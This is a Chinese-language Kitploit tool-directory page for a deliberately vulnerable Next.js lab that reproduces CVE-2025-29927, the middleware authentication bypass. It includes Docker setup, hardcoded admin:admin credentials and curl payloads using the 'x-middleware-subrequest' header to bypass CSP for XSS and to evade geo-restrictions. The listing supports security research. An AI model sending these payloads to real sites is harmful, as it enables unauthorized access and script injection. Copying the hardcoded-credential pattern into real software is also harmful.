Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
next.js_cve-2025-29927 — 用于CVE-2025-29927 Next.js中间件认证绕过的测试环境。包含Docker配置,用于利用管理员访问权限并绕过CSP/地理限制,以进行安全研究。 | Kitploit
工具/GitHubGitHub/0xpthree/next.js_cve-2025-29927
身份验证与授权漏洞分析IDS/IPS规避Web应用程序漏洞利用WAF绕过渗透测试
GitHub0xpthree/next.js_cve-2025-29927

next.js_cve-2025-29927

用于CVE-2025-29927 Next.js中间件认证绕过的测试环境。包含Docker配置,用于利用管理员访问权限并绕过CSP/地理限制,以进行安全研究。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

next.js_cve-2025-29927

一个小型且简单的 Next.js 应用程序,运行版本 14.2.24,用于测试 CVE-2025-29927。

通过利用该漏洞或使用硬编码凭据 admin:admin 访问管理区域(/admin)。

root@kitploit:~
» git clone [email protected]:0xPThree/next.js_cve-2025-29927.git
» docker build -t nextjs .
» docker run -d -p 3000:3000 --name nextjs nextjs

除了明显的身份验证绕过外,此漏洞还可以:

root@kitploit:~
# Middleware may be used to set CSP headers to prevent XSS. Bypass CSP to XSS:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
-H "Content-Type: text/html" --data "<script>alert('1')</script>" \
http://exploit.se

# Middleware may be used to restrict content by geographic location. Bypass geographic restrictions:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
-H "CF-IPCountry: SE" http://exploit.se/se-only-content

image

下载工具